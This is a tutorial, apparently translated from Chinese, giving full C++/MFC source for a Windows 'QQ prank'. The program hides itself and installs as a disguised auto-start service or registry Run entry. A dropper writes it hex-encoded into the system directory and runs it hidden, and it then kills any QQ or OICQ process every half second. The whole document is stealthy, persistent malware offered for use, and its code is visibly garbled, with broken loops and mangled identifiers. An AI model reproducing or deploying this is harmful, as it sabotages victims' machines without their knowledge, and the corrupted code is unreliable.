Create a QQ prank Program

Create a QQ prank Program

Program principle: obtain all processes in the system and store them in an array. Then, find the processes containing QQ, OICQ, QQ, and OICQ in the array, immediately kill the process if it is found. in this way, when you run QQ, the QQ process will be killed immediately. That is to say, if the prank program runs continuously, you will not be able to access QQ. oh, is this a bit poisonous? Okay,
Now let's talk about the program writing process step by step.

The first problem we need to solve is how to implement self-hiding of the prank program. There are many articles about process hiding. I will just give a brief introduction. in the Win9x system, you can call the registerserviceprocess API to register a process as a service-mode process, in this way, the process will not appear in the task manager that is invoked by pressing CTRL + ALT + del in the Win9x system. the registerserviceprocess API function is stored in the system kernel kernel32.dll. the specific statement is as follows:
DWORD registerserviceprocess (
DWORD dwprocessid, // process flag of the service process. If it is null, it indicates the current process.
DWORD dwtype // If the parameter is rsp_simple_service, the current process is registered.
// If the parameter is rsp_unregister_service, the registration of the current process is canceled.
);
If the function is successfully called, 1 is returned. Otherwise, 0 is returned.
By calling the registerserviceprocess API function, we can hide the process in Win9x. however, the real implementation process hiding in the WINNT system is not as simple as that in the Win9x system. as long as the process runs in the form of a process kernel, the process will appear in the task manager. to truly hide processes in WINNT, you can only execute the target code in non-process mode, that is, remotely register the target code to the host process as a thread. the implementation of this method has been introduced in this article, so I will not talk about it here. here, I did not use this hidden process method but registered the process as a service process named service in the system. Although there is no real hidden process, but in general, it is not easy to find. when you view a process in the task manager in Win2000, the process cannot be terminated. You must stop the service through the Service Management Console in the control panel, you can also use net stop service in the command line to stop the service. In XP, you can end the process through the task manager. here is a brief introduction to the service programs in winnt:
In WINNT, some background service programs are automatically loaded as the system starts. you can also use the service management console in the control panel to flexibly set service attributes. these service programs can be started even if the user does not log on. For example, FTP services, WWW services, and some databases exist on the NT server in the form of services, thus achieving no responsibilities. this section describes.
Secret will be created in the system directory of Win2000/XP.
Now we start writing kernel.exe:
Open VC ++ 6.0 (ah? Don't tell me that you haven't installed a program on your computer, so hurry and install one. Otherwise, how do you write a program? Haha)
Run Appwizard to create a dialog box application. The project name is kernel. Add hidewindow (), hideprocess (),
Reg () three functions. The Code is as follows:
// Hide the dialog box
Void ckerneldlg: hidewindow ()
{
DWORD style =: getwindowlong (afxgetmainwnd ()-> m_hwnd, gwl_exstyle );
Style = ws_ex_toolwindow;
: Setwindowlong (afxgetmainwnd ()-> m_hwnd, gwl_exstyle, style );
: Movewindow (afxgetmainwnd ()-> m_hwnd, 0, 0, 0, false );
}
// Register a process as a service mode process to hide itself
Void ckerneldlg: hideprocess ()
{
Typedef DWORD (callback * lpregisterserviceprocess) (DWORD, DWORD );
Hinstance hdll;
Lpregisterserviceprocess;
Hdll = loadlibrary ("Kernel32 ");
Lpregisterserviceprocess = (lpregisterserviceprocess)
Getprocaddress (hdll, "registerserviceprocess ");
Lpregisterserviceprocess (getcurrentprocessid (), 1 );
Freelibrary (hdll );
}
// Modify the registry and run automatically upon startup
Void ckerneldlg: Reg ()
{
Lptstr lpsyspath = new char [max_path];
: Getsystemdirectory (lpsyspath, max_path );
Lptstr lpsysfilename;
Lpsysfilename = (lpctstr) lstrcat (lpsyspath, "// kernel.exe ");
DWORD dwvalue;
Cregkey key;
Lpctstr lpszkeyname = "software // Microsoft // windows // CurrentVersion // run ";
If (key. Open (HKEY_LOCAL_MACHINE, lpszkeyname) = error_success)
If (key. queryvalue (dwvalue, "kernel ")! = Error_success)
Key. setvalue (lpsysfilename, "kernel ");
Key. Close ();
}
The cregkey class is used here, which must be in kerneldlg. add the header file atlbase in CPP. H for detailed usage of cregkey, refer to the msdn help documentation. then, use the Class Wizard to add the wm_timer message and add the following code to the Message response function:
Void ckerneldlg: ontimer (uint nidevent)
{
M_pearray.removeall ();
Handle hprocesssnap = NULL;
Processentry32 pe32;
Hprocesssnap =: createconlhelp32snapshot (th32cs_snapprocess, 0 );
Pe32.dwsize = sizeof (processentry32 );
// Enumerate all processes in the system and save them in the array class Object m_pearray
If (: process32first (hprocesssnap, & pe32 ))
{
Do
{
M_pearray.add (pe32 );
}
While (: process32next (hprocesssnap, & pe32 ));

}
Int I;
// Find the process containing the characters QQ, OICQ, QQ, and oicq in the saved process array and immediately end it.
For (I = 0; I {
Cstring STR;
Str. Format ("% s", m_pearray [I]. szexefile );
If (Str. Find ("QQ ")! =-1 │ Str. Find ("OICQ ")! =-1 │ Str. Find ("QQ ")! =-1 │ Str. Find ("OICQ ")! =-1)
{
Handle hprocess;
DWORD processid;
Processid = m_pearray [I]. th32processid;
Hprocess =: OpenProcess (process_all_access, false, processid );
: Terminateprocess (hprocess, 99 );
Closehandle (hprocess );
}
}

Cdialog: ontimer (nidevent );
}
M_pearray is defined as follows: carray m_pearray;. Add the following code to the initialization function of the dialog box:
Bool ckerneldlg: oninitdialog ()
{
Cdialog: oninitdialog ();
......
......
Hidewindow (); // hide the dialog box window
Hideprocess (); // hide the process in the task manager in Win9x
Reg (); // rewrite the registry and run automatically upon startup
Settimer (1,500, null); // set the timer, refresh the process array, and find the QQ process to end it.
Return true;
}
The kernel.exe program is complete. Now you can compile and connect to the executable file. (The project file is attached ).
Compile service.exe:

Create a Win32 console application program named "service" and select the code that supports service. cpp for MFC as follows:
/*************************************** ***************************/
/* Module: Service. cpp */
/* Author: inetufo */
/* Email: Inetufo@thugx.com */
/* Date: 2003/3/7 */
/*************************************** ***************************/
// Service. cpp: defines the entry point for the console application.
//

# Include "stdafx. H"
# Include "service. H"
# Include "winsvc. H"
# Include // header files required by the cregkey class
# Include // header files required by the carray class
# Include // header file required by the toolhelp Function

# Ifdef _ debug
# Define new debug_new
# UNDEF this_file
Static char this_file [] = _ file __;
# Endif

//////////////////////////////////////// /////////////////////////////////////
// The one and only Application Object
Cwinapp theapp;
Using namespace STD;
Service_status_handle SSH;
SC _handle SCM, SVC;
Service_status SS;
Carray m_pearray;
Void winapi servicemain (DWORD dwargc, lptstr * lpszargv );
Void winapi handler (DWORD opcode );
Void installservice ();
Uint killqq (lpvoid );

Int _ tmain (INT argc, tchar * argv [], tchar * envp [])
{
Int nretcode = 0;

// Initialize MFC and print and error on Failure
If (! Afxwininit (: getmodulehandle (null), null,: getcommandline (), 0 ))
{
// Todo: Change error code to suit your needs
Cerr <_ T ("Fatal error: MFC initialization failed") <Endl;
Nretcode = 1;
}
Else
{

Service_table_entry ste [2];
// Thread entry table
Ste [0]. lpservicename = "service"; // thread name
Ste [0]. lpserviceproc = servicemain; // thread entry address
// You can have multiple threads. The last thread must be null.
Ste [1]. lpservicename = NULL;
Ste [1]. lpserviceproc = NULL;
Startservicectrldispatcher (STE );
Installservice ();
}

Return nretcode;
}
// Install and start the service
Void installservice ()
{
Lptstr lpsyspath = new char [max_path];
: Getsystemdirectory (lpsyspath, max_path );
Lptstr lpsysfilename;
Lpsysfilename = (lpctstr) lstrcat (lpsyspath, "// service.exe ");
SCM = openscmanager (null, null, SC _manager_all_access );
If (SCM! = NULL)
SVC = createservice (SCM, "service", "service", service_all_access,
Service_win32_own_process │ service_interactive_process, service_auto_start, service_error_ignore, lpsysfilename, null, null );
If (SVC! = NULL)
SVC = openservice (SCM, "service", service_start );
If (SVC! = NULL)
{
Startservice (SVC, 0, null );
Closeservicehandle (SVC );
}
Closeservicehandle (SCM );
}
// Real entry point functions of the Service
Void winapi servicemain (DWORD dwargc, lptstr * lpszargv)
{

SS. dwservicetype = service_win32;
SS. dwcurrentstate = service_start_pending;
SS. dwcontrolsaccepted = service_accept_stop │ service_accept_pause_continue;
SS. dwservicespecificexitcode = 0;
SS. dwwin32exitcode = 0;
SS. dwcheckpoint = 0;
SS. dwwaithint = 0;
SSH = registerservicectrlhandler ("service", Handler );
SS. dwcurrentstate = service_running;
SS. dwcheckpoint = 0;
SS. dwwaithint = 0;
Setservicestatus (SSH, & SS );
Afxbeginthread (killqq, null, null); // start a working thread to implement program functions
SS. dwcurrentstate = service_running;
SS. dwcheckpoint = 0;
SS. dwwaithint = 0;
Setservicestatus (SSH, & SS );

}
// Handle service requirements
Void winapi handler (DWORD opcode)
{
Switch (opcode)
{
Case service_control_stop:
SS. dwcurrentstate = service_stopped;
Setservicestatus (SSH, & SS );
Break;
Case service_control_continue:
SS. dwcurrentstate = service_running;
Setservicestatus (SSH, & SS );
Break;
Case service_control_pause:
SS. dwcurrentstate = service_paused;
Setservicestatus (SSH, & SS );
Break;

Case service_control_interrogate:
Break;
}

Setservicestatus (SSH, & SS );
}
// Find the QQ program and kill the thread function in the process list
Uint killqq (lpvoid lparam)
{
While (1)
{

M_pearray.removeall ();
Handle hprocesssnap = NULL;
Processentry32 pe32;
Hprocesssnap =: createconlhelp32snapshot (th32cs_snapprocess, 0 );
Pe32.dwsize = sizeof (processentry32 );
If (: process32first (hprocesssnap, & pe32 ))
{
Do
{
M_pearray.add (pe32 );
}
While (: process32next (hprocesssnap, & pe32 ));

}
Int I;
For (I = 0; I {
Cstring STR;
Str. Format ("% s", m_pearray [I]. szexefile );
If (Str. Find ("QQ ")! =-1 │ Str. Find ("OICQ ")! =-1 │ Str. Find ("QQ ")! =-1 │ Str. Find ("OICQ ")! =-1)
{
Handle hprocess;
DWORD processid;
Processid = m_pearray [I]. th32processid;
Hprocess =: OpenProcess (process_all_access, false, processid );
: Terminateprocess (hprocess, 99 );
Closehandle (hprocess );
}
}

Sleep (500 );
}
Return 0;
}
Compile the link to generate the service.exe program. (the entire project is attached)
Now we have achieved two real-time function programs. kernel.exeis the program that implements the function under win9xsystem, and service.exe is the program that implements the function under win2000/XP. now we need to convert these two files into hexadecimal code. you can use a program to create a Win32 console application program named exe2hex. The program code is as follows:
# Include
# Include
Int main (INT argc, char ** argv)
{
Handle hfile;
DWORD dwsize, dwread, dwindex = 0, I;
Unsigned char * lpbuff = NULL;
_ Try
{
If (argc! = 2)
{
Printf ("/nusage: % s", argv [0]);
_ Leave;
}

Hfile = createfile (argv [1], generic_read, file_share_read, null, open_existing, file_attribute_normal, null );
If (hfile = invalid_handle_value)
{
Printf ("/nopen file % s failed: % d", argv [1], getlasterror ());
_ Leave;
}
Dwsize = getfilesize (hfile, null );
If (dwsize = invalid_file_size)
{
Printf ("/ngET file size failed: % d", getlasterror ());
_ Leave;
}
Lpbuff = (unsigned char *) malloc (dwsize );
If (! Lpbuff)
{
Printf ("/nmalloc failed: % d", getlasterror ());
_ Leave;
}
While (dwsize> dwindex)
{
If (! Readfile (hfile, & lpbuff [dwindex], dwsize-dwindex, & dwread, null ))
{
Printf ("/nread file failed: % d", getlasterror ());
_ Leave;
}
Dwindex + = dwread;
}
For (I = 0; I {
If (I % 16) = 0)
If (I = 0)
Printf ("/"");
Else
Printf ("/"/n /"");
Printf ("// X %. 2x", lpbuff [I]);
}
Printf ("/"");
} // End of try
_ Finally
{
If (lpbuff) Free (lpbuff );
Closehandle (hfile );
}
Return 0;
}
Compile the executable file exe2hex.exe and execute exe2hex kernel.exe> kernel.txt to redirect the output result to the 16-step code of kernel.exe. you can also get the hexadecimal code of service.exe.
Ah, it's really a little tired to write so much, but it's always worth it. Finally, let's compile the main program funny.exe:
Use appwizardto generate a dialog box named funny.define two parameter groups to save kernel.exeand service.exe
Hexadecimal code: Char exebuff9x [] = "kernel.exe hexadecimal code" char exebuff2k [] = "service.exe hexadecimal code ". add hidewindow (), iswin9x (), createfileservice9x (cstring filename), createfileservice2k
(Cstring filename), runservice (cstring filename) functions, its code and implementation functions are as follows:
// Hide the Main Window
Void cfunnydlg: hidewindow ()
{
DWORD style =: getwindowlong (afxgetmainwnd ()-> m_hwnd, gwl_exstyle );
Style = ws_ex_toolwindow;
: Setwindowlong (afxgetmainwnd ()-> m_hwnd, gwl_exstyle, style );
: Movewindow (afxgetmainwnd ()-> m_hwnd, 0, 0, 0, false );
}
// Obtain the operating system version
Bool cfunnydlg: iswin9x ()
{
DWORD dwversion;
Dwversion =: getversion ();
If (dwversion> = 0x80000000) // Win9x
Return true;
Else
Return false; // Win2k/WINXP
}
// If the system is win9x, create kernel.exe in the system directory.
Void cfunnydlg: createfileservice9x (cstring filename)
{
DWORD I = 0, dwindex = 0, dwwrite, dwsize = sizeof (exebuff9x );
Handle hfile = NULL;
Lptstr lpsyspath = new char [max_path];
Lptstr lpcurrentpath = new char [max_path];
: Getsystemdirectory (lpsyspath, max_path );
Lptstr lpsysfilename;
Lpsysfilename = (lpctstr) lstrcat (lpsyspath, filename );
Hfile =: createfile (lpsysfilename, generic_write │ generic_read, file_pai_read │ file_pai_write, null,
Create_always, file_attribute_normal, null );
If (hfile = invalid_handle_value)
Return;
While (dwsize> dwindex)
{
If (! : Writefile (hfile, & exebuff9x [dwindex], dwsize-dwindex, & dwwrite, null ))
Return;
Dwindex + = dwwrite;
}
Closehandle (hfile );
Return;
}
// If the system is Win2k/xp, service.exe is created in the system directory.
Void cfunnydlg: createfileservice2k (cstring filename)
{
DWORD I = 0, dwindex = 0, dwwrite, dwsize = sizeof (exebuff2k );
Handle hfile = NULL;
Lptstr lpsyspath = new char [max_path];
Lptstr lpcurrentpath = new char [max_path];
: Getsystemdirectory (lpsyspath, max_path );
Lptstr lpsysfilename;
Lpsysfilename = (lpctstr) lstrcat (lpsyspath, filename );
Hfile =: createfile (lpsysfilename, generic_write │ generic_read, file_pai_read │ file_pai_write, null,
Create_always, file_attribute_normal, null );
If (hfile = invalid_handle_value)
Return;
While (dwsize> dwindex)
{
If (! : Writefile (hfile, & exebuff2k [dwindex], dwsize-dwindex, & dwwrite, null ))
Return;
Dwindex + = dwwrite;
}
Closehandle (hfile );
Return;
}
// Run the created kernel.exew.service.exe
Void cfunnydlg: runservice (cstring filename)
{
Lptstr lpsyspath = new char [max_path];
: Getsystemdirectory (lpsyspath, max_path );
Lptstr lpsysfilename;
Lpsysfilename = (lpctstr) lstrcat (lpsyspath, filename );
Process_information PI;
Startupinfo Si;
Memset (& Si, 0, sizeof (SI ));
Si. cb = sizeof (SI );
Si. wshowwindow = sw_hide;
Si. dwflags = startf_useshowwindow;
Bool Bret =: CreateProcess (lpsysfilename, null, false, normal_priority_class, null, null, & Si, & PI );
Return;
}
Call the previously defined function in the initialization function of the dialog box. The main code is as follows:
Bool cfunnydlg: oninitdialog ()
{
Cdialog: oninitdialog ();
......
......
Hidewindow (); // hide the dialog box window
Cstring filename = "// kernel.exe ";
If (iswin9x () // determines the operating system type
{
Createfileservice9x (filename); // create kernel.exe in the system directory
Runservice (filename); // run kernel.exe
}
Else
{
Filename = "// service.exe ";
Createfileservice2k (filename); // create the service.exe file in the system directory
Runservice (filename); // run service.exe
}
Afxbeginthread (threadmessage, null, null); // executes the threadmessage function.
Return true;
}
Okay, the funny program is complete. Now you can compile and connect to the executable program. Even if the entire program is finished, you can test the above Code in Win98, Win2000, WINXP, in the VC ++ 6.0 environment, debugging is successful. (Attached to the entire project file ). it's almost exhausting to write so much.